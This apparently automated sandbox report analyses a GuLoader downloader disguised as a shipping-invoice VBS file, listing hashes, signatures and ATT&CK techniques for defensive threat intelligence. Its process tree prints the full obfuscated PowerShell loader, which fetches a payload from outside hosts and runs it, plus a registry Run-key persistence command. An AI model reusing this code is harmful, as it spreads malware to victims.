Overview

overview

10

Static

static

1

doc_awb_sh...24.vbs

windows7-x64

10

doc_awb_sh...24.vbs

windows10-2004-x64

Resubmissions

19-04-2024 15:05

240419-sf73lsgc4x 10

18-04-2024 10:07

240418-l5m1eabc4s 10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    18-04-2024 10:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    doc_awb_shipping_invoice_17_04_2024_000000000000024.vbs

  • Size

    403KB

  • MD5

    d8e8da20535c7928e416af72d69cc817

  • SHA1

    2e6151a12a6ecafdb2943166e1c11417eeebcf7f

  • SHA256

    814c44267d5b05f72b1d8a0a2f9d165515d109383cf9061688c59bc59709f57f

  • SHA512

    47b603258dc07d8ebf809d29071c634f15670bd95d52c7968cfcc064087ff94ff0896a725cfb94b335e55bddd622d711341a542d4ca10b8d6cc127f0d7b13cdd

  • SSDEEP

    6144:ltrc0iH9QXg0Im+aUGFvWtBVkmFtNqsgBt8FD3PG7BXMVbc:lFidQ0lBzzTc

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc_awb_shipping_invoice_17_04_2024_000000000000024.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Shunners = 1;$Zonernes='Substrin';$Zonernes+='g';Function Bjrgningerne($Uldspindet){$Sauteringers187=$Uldspindet.Length-$Shunners;For($Mouthing=2; $Mouthing -lt $Sauteringers187; $Mouthing+=(3)){$Sommerferier+=$Uldspindet.$Zonernes.Invoke($Mouthing, $Shunners);}$Sommerferier;}function Embulk($Arctician166){. ($Harmonize) ($Arctician166);}$stationsby=Bjrgningerne 'peMSjoPezT.iK lCul a P/ P5He.B.0Hy L.( .WAfi.an.td.no,owbesR, ANWeTIn St1No0Th. 0 e; , ,WH,i QnCl6J.4 C; . Sx,a6R.4 t;H. Jor ivH,:B.1O.2Ss1fa.sw0G,)B, KuGine Sc Rkcio.i/Ac2No0Ca1,a0 ,0M 1U 0Dd1,n MeFP.iStrPeeBefHuo exHe/Co1wi2Ef1.s. ,0 S ';$Solvarmes=Bjrgningerne '.aUSys De.crLi-AuAMegM,em n VtMo ';$Ordrebehandlingerne=Bjrgningerne 'BohOvtVotV pda: u/No/C,9 ,4S..Co1Ar5ho6Un.un7,n9Ap.,a6.e4 S/P UP d .eexm UiB,lH.jL,eSttRassn. IpGafSam C> ,hBrtOctRepEf:C,/re/ ,1Bu9Ho3 u.B.2.l2Mo2F .Af9,i6C..K,1 d4 G9,v/SkU dC eN m iUnlEkjFreMet.nsb..I.p.ef hmSa ';$Stallage=Bjrgningerne ' a>Br ';$Harmonize=Bjrgningerne 'GiiHje.hxHe ';$Bygsukkerne = Bjrgningerne 'PueRvc .hUnoB L.% na.up,ap.xd.faNetEda D%Op\SlISkns,dS,t RaSigS nCoiHenBug eeJorCh.LeE .nTueme F.&.q& e a.e.ec Ah.eo.r Op$Je ';Embulk (Bjrgningerne 'Pa$SigGrlM oUnb UaMel C:MaSR,hPeoDescoh eo BnKseDra Vn =P,(ugcPampldGe .o/Guc,a Nu$SpBCoyV,g sNruCek Pk ,eMarTenUde ) B ');Embulk (Bjrgningerne 'Ne$.egR l HoMobSeaOvlGo:XeT ,a.olGeeVas,upHor eoSpgFrsRopser SgPieSntIns M= S$VeO orAndTrr.aePab ,eDehUna,ynStdPrlEliKnnungPje hrPen .eSu. sOspFll IiEjtF (fr$ S t,ia Yl ClU,aCogLieIs)Fi ');$Ordrebehandlingerne=$Talesprogsprgets[0];Embulk (Bjrgningerne 'Bu$ CgVilP.o ,b RaUnl A: .S ,kSti LbGrst,dSkrS.eC,n BgpheMisD,=UnNC e .wS.-N,OPrbThj eRac Ct,v PSN,y,asUdt reNemLa. ,NSie.ytFu.ChW.ieDobKaCFol iP.eSknBatBr ');Embulk (Bjrgningerne 'Un$R.SOmk ,iSjbLes odPorBue PnA gChe esUd.gaHAde.aaF dHoeBerPrs,r[.o$,nSBoohyl uv oa ,r ,mbaeSpsVe] =Hv$BlsAstBeaHat,eiProMen usB,bBry D ');$Atriummet=Bjrgningerne 'T,SVakBii RbFys id ,rMeeJ.na g.te MsFd.BeD .okow.hnB,lE.oAla dCaFS iBrlSue.p(Lo$.uOZirUndAnr ae Sb ,eSkh Ca BnR d.ol Si Sn .gSqeVirChnh.eBe,Xo$BuNUno dnMulAzi,omfoiM,tA,aDetCriUroBinBa)De ';$Atriummet=$Shoshonean[1]+$Atriummet;$Nonlimitation=$Shoshonean[0];Embulk (Bjrgningerne 'Po$T,g Ml To VbR.a.alT.:GrG,ioDud PsBie FkSls ,pPreTrdHei TtPrr.ae.frVin.eeJus ,=Op( .TB.e Ns tE.-HoPTeaVotDih o Sm$SeNOuok.nUnlA.iFom li st HaextN.iHeoJonKa)Op ');while (!$Godsekspeditrernes) {Embulk (Bjrgningerne ' ,$F gUllReo Pb Wa.elTr:KiMena AdovotanV.nSvaE.eScr .n .eT =Ud$BrtTer euKie.r ') ;Embulk $Atriummet;Embulk (Bjrgningerne 'SmS Bt GaZirFot C-DoS .lu.eKoe .pOv ,o4Fo ');Embulk (Bjrgningerne 'Fa$ Rg,alL,oArb pastlGa: GS,oG.d SsHyeUpk ,sLdp e,ldAgiW.t.nrA e .r Hn yeFasLa=Co(,tTSaeRes UtA.-RaP uaPlt ShVo Su$BeN RoP.n .lMoi FmFsiGetP.a atDoiFloManKa)Be ') ;Embulk (Bjrgningerne 'A,$LygO.lYeoKubEuaPolCe: GPValBeaRenOflAcgApnNoi Pn .gAfs rFra faSidK eFrt p=Me$Ung lB.oenbRoaKol u:BaASan Ga LlPsyZys aE tBlo,orT sSp+ S+En%Ra$HjTHjaClluaeunsFrpNor,eoHag ,sSyp BrA g GeBlt.osTa.PicMuoM.uFin,utUs ') ;$Ordrebehandlingerne=$Talesprogsprgets[$Planlgningsraadet];}Embulk (Bjrgningerne '.a$.egvolFaoGeb UaPilF.:BeBCru OnMidFlhReoFllU,dAc Ra=K UnG ,ePrtB -TaCEroSkn StOpe,unTrt D Sa$saNReo.in elCoi ,mS i ,t.na LtBai,mo DnHd ');Embulk (Bjrgningerne 'Si$Spg,elB oP.bBiaOplIm:,hW Aa Rr ,sf,tKllLai .nU gB, A=R. I.[CaSK.y .sBetNeeInm .G CSko TnChvPoe .r jtUn]Fr:sk: rFS r eoHemEuBOtaSasUle m6Ad4.kS atSur PiFonMag i(In$StBCru .nRedPeh,uoNal ad.e)Re ');Embulk (Bjrgningerne ',n$V,g ,lRvoB b Va AlTe: CK .r,aiS,b .lS.epasH m,=,r Di[drS Ny ds,rtE,eBemBo.KlTNoeIsx ctKu. aE an Ac Kotudn.iAin IgFl]Km:.a:CaAKoSEvCT.IGiIel.viG veRetH,ST,t Pr BiE ny g,u(Bl$FdW a ar rsLotKalHyiNonreg k) ');Embulk (Bjrgningerne ' m$OrgCalFroAxbAvaStlO :G,a Jd ,rAfeDas,ksvaer lKoi anStiUneRenElsOp=.t$,yK srUdiSibmil,ye nsA..CusUnuR,bVesSptCarPriR nDegEp(Ac3St2Ch9De6Om6in6Vi,Fr2De6 ,2Pu0 F6 .).e ');Embulk $adresseliniens;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtagninger.Ene && echo $"
        3⤵
          PID:1652
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shunners = 1;$Zonernes='Substrin';$Zonernes+='g';Function Bjrgningerne($Uldspindet){$Sauteringers187=$Uldspindet.Length-$Shunners;For($Mouthing=2; $Mouthing -lt $Sauteringers187; $Mouthing+=(3)){$Sommerferier+=$Uldspindet.$Zonernes.Invoke($Mouthing, $Shunners);}$Sommerferier;}function Embulk($Arctician166){. ($Harmonize) ($Arctician166);}$stationsby=Bjrgningerne 'peMSjoPezT.iK lCul a P/ P5He.B.0Hy L.( .WAfi.an.td.no,owbesR, ANWeTIn St1No0Th. 0 e; , ,WH,i QnCl6J.4 C; . Sx,a6R.4 t;H. Jor ivH,:B.1O.2Ss1fa.sw0G,)B, KuGine Sc Rkcio.i/Ac2No0Ca1,a0 ,0M 1U 0Dd1,n MeFP.iStrPeeBefHuo exHe/Co1wi2Ef1.s. ,0 S ';$Solvarmes=Bjrgningerne '.aUSys De.crLi-AuAMegM,em n VtMo ';$Ordrebehandlingerne=Bjrgningerne 'BohOvtVotV pda: u/No/C,9 ,4S..Co1Ar5ho6Un.un7,n9Ap.,a6.e4 S/P UP d .eexm UiB,lH.jL,eSttRassn. IpGafSam C> ,hBrtOctRepEf:C,/re/ ,1Bu9Ho3 u.B.2.l2Mo2F .Af9,i6C..K,1 d4 G9,v/SkU dC eN m iUnlEkjFreMet.nsb..I.p.ef hmSa ';$Stallage=Bjrgningerne ' a>Br ';$Harmonize=Bjrgningerne 'GiiHje.hxHe ';$Bygsukkerne = Bjrgningerne 'PueRvc .hUnoB L.% na.up,ap.xd.faNetEda D%Op\SlISkns,dS,t RaSigS nCoiHenBug eeJorCh.LeE .nTueme F.&.q& e a.e.ec Ah.eo.r Op$Je ';Embulk (Bjrgningerne 'Pa$SigGrlM oUnb UaMel C:MaSR,hPeoDescoh eo BnKseDra Vn =P,(ugcPampldGe .o/Guc,a Nu$SpBCoyV,g sNruCek Pk ,eMarTenUde ) B ');Embulk (Bjrgningerne 'Ne$.egR l HoMobSeaOvlGo:XeT ,a.olGeeVas,upHor eoSpgFrsRopser SgPieSntIns M= S$VeO orAndTrr.aePab ,eDehUna,ynStdPrlEliKnnungPje hrPen .eSu. sOspFll IiEjtF (fr$ S t,ia Yl ClU,aCogLieIs)Fi ');$Ordrebehandlingerne=$Talesprogsprgets[0];Embulk (Bjrgningerne 'Bu$ CgVilP.o ,b RaUnl A: .S ,kSti LbGrst,dSkrS.eC,n BgpheMisD,=UnNC e .wS.-N,OPrbThj eRac Ct,v PSN,y,asUdt reNemLa. ,NSie.ytFu.ChW.ieDobKaCFol iP.eSknBatBr ');Embulk (Bjrgningerne 'Un$R.SOmk ,iSjbLes odPorBue PnA gChe esUd.gaHAde.aaF dHoeBerPrs,r[.o$,nSBoohyl uv oa ,r ,mbaeSpsVe] =Hv$BlsAstBeaHat,eiProMen usB,bBry D ');$Atriummet=Bjrgningerne 'T,SVakBii RbFys id ,rMeeJ.na g.te MsFd.BeD .okow.hnB,lE.oAla dCaFS iBrlSue.p(Lo$.uOZirUndAnr ae Sb ,eSkh Ca BnR d.ol Si Sn .gSqeVirChnh.eBe,Xo$BuNUno dnMulAzi,omfoiM,tA,aDetCriUroBinBa)De ';$Atriummet=$Shoshonean[1]+$Atriummet;$Nonlimitation=$Shoshonean[0];Embulk (Bjrgningerne 'Po$T,g Ml To VbR.a.alT.:GrG,ioDud PsBie FkSls ,pPreTrdHei TtPrr.ae.frVin.eeJus ,=Op( .TB.e Ns tE.-HoPTeaVotDih o Sm$SeNOuok.nUnlA.iFom li st HaextN.iHeoJonKa)Op ');while (!$Godsekspeditrernes) {Embulk (Bjrgningerne ' ,$F gUllReo Pb Wa.elTr:KiMena AdovotanV.nSvaE.eScr .n .eT =Ud$BrtTer euKie.r ') ;Embulk $Atriummet;Embulk (Bjrgningerne 'SmS Bt GaZirFot C-DoS .lu.eKoe .pOv ,o4Fo ');Embulk (Bjrgningerne 'Fa$ Rg,alL,oArb pastlGa: GS,oG.d SsHyeUpk ,sLdp e,ldAgiW.t.nrA e .r Hn yeFasLa=Co(,tTSaeRes UtA.-RaP uaPlt ShVo Su$BeN RoP.n .lMoi FmFsiGetP.a atDoiFloManKa)Be ') ;Embulk (Bjrgningerne 'A,$LygO.lYeoKubEuaPolCe: GPValBeaRenOflAcgApnNoi Pn .gAfs rFra faSidK eFrt p=Me$Ung lB.oenbRoaKol u:BaASan Ga LlPsyZys aE tBlo,orT sSp+ S+En%Ra$HjTHjaClluaeunsFrpNor,eoHag ,sSyp BrA g GeBlt.osTa.PicMuoM.uFin,utUs ') ;$Ordrebehandlingerne=$Talesprogsprgets[$Planlgningsraadet];}Embulk (Bjrgningerne '.a$.egvolFaoGeb UaPilF.:BeBCru OnMidFlhReoFllU,dAc Ra=K UnG ,ePrtB -TaCEroSkn StOpe,unTrt D Sa$saNReo.in elCoi ,mS i ,t.na LtBai,mo DnHd ');Embulk (Bjrgningerne 'Si$Spg,elB oP.bBiaOplIm:,hW Aa Rr ,sf,tKllLai .nU gB, A=R. I.[CaSK.y .sBetNeeInm .G CSko TnChvPoe .r jtUn]Fr:sk: rFS r eoHemEuBOtaSasUle m6Ad4.kS atSur PiFonMag i(In$StBCru .nRedPeh,uoNal ad.e)Re ');Embulk (Bjrgningerne ',n$V,g ,lRvoB b Va AlTe: CK .r,aiS,b .lS.epasH m,=,r Di[drS Ny ds,rtE,eBemBo.KlTNoeIsx ctKu. aE an Ac Kotudn.iAin IgFl]Km:.a:CaAKoSEvCT.IGiIel.viG veRetH,ST,t Pr BiE ny g,u(Bl$FdW a ar rsLotKalHyiNonreg k) ');Embulk (Bjrgningerne ' m$OrgCalFroAxbAvaStlO :G,a Jd ,rAfeDas,ksvaer lKoi anStiUneRenElsOp=.t$,yK srUdiSibmil,ye nsA..CusUnuR,bVesSptCarPriR nDegEp(Ac3St2Ch9De6Om6in6Vi,Fr2De6 ,2Pu0 F6 .).e ');Embulk $adresseliniens;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2632
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indtagninger.Ene && echo $"
            4⤵
              PID:2044
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1712
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Homothety37" /t REG_EXPAND_SZ /d "%Udredelsen% -w 1 $Potencies=(Get-ItemProperty -Path 'HKCU:\Iberegningens\').prakke;%Udredelsen% ($Potencies)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:764
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Homothety37" /t REG_EXPAND_SZ /d "%Udredelsen% -w 1 $Potencies=(Get-ItemProperty -Path 'HKCU:\Iberegningens\').prakke;%Udredelsen% ($Potencies)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1404

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Indtagninger.Ene
        Filesize

        463KB

        MD5

        82e00b8f6dee7127e90f311c6524efff

        SHA1

        57b7761746fa7869f1d5f06a3ede2deb518cc068

        SHA256

        f6fc403fb0f0a6e5d85c52feebbd503eed0dc750464a4197944a27ea03aee668

        SHA512

        f180877b55d7112197f87371ba10a0d586e53cd20d4acdcfc3cc851c4f5add37e9a1f84326151929703d226876e8f4b6f3bfe7f8035fd0b7572e8c476f317da8

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SUJ4G7KHRRS1F1G3ZM5D.temp
        Filesize

        7KB

        MD5

        4a23fe24dec3ce2b649c41b51b45bf90

        SHA1

        a95e3b1cdeb935933e26b0890298ca26b1d2e669

        SHA256

        628c28a74fd995ed94907da392226e0cab0d98d507a6740a904b62e6478f13be

        SHA512

        a425a4ca9a3df1fd4713622fcad6a78698ac5231a63d85ca6c254eb1bc53c204e320a5f7dc38ca9d54ae0db006d21d3b49ce1796db7eaa41a4be1fd7180f32f4

        Download Submit
      • memory/1712-61-0x0000000077BE0000-0x0000000077CB6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1712-57-0x0000000001810000-0x0000000006E1E000-memory.dmp
        Filesize

        86.1MB

        Download
      • memory/1712-55-0x0000000077BE0000-0x0000000077CB6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1712-54-0x00000000007A0000-0x0000000001802000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1712-53-0x0000000077BE0000-0x0000000077CB6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1712-52-0x0000000077C16000-0x0000000077C17000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1712-51-0x00000000779F0000-0x0000000077B99000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2632-48-0x0000000002C50000-0x0000000002C90000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2632-46-0x0000000073A30000-0x0000000073FDB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2632-35-0x0000000073A30000-0x0000000073FDB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2632-36-0x0000000002C50000-0x0000000002C90000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2632-33-0x0000000073A30000-0x0000000073FDB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2632-38-0x0000000002C50000-0x0000000002C90000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2632-49-0x0000000077BE0000-0x0000000077CB6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2632-34-0x0000000002C50000-0x0000000002C90000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2632-47-0x00000000779F0000-0x0000000077B99000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2632-43-0x00000000055A0000-0x00000000055A1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2632-42-0x00000000066E0000-0x000000000BCEE000-memory.dmp
        Filesize

        86.1MB

        Download
      • memory/2776-40-0x0000000002900000-0x0000000002980000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2776-27-0x0000000002900000-0x0000000002980000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2776-44-0x0000000002900000-0x0000000002980000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2776-41-0x0000000002900000-0x0000000002980000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2776-21-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2776-39-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2776-28-0x0000000002900000-0x0000000002980000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2776-45-0x0000000002900000-0x0000000002980000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2776-26-0x0000000002900000-0x0000000002980000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2776-25-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2776-24-0x0000000001E10000-0x0000000001E18000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2776-23-0x0000000002900000-0x0000000002980000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2776-59-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2776-22-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
        Filesize

        9.6MB

        Download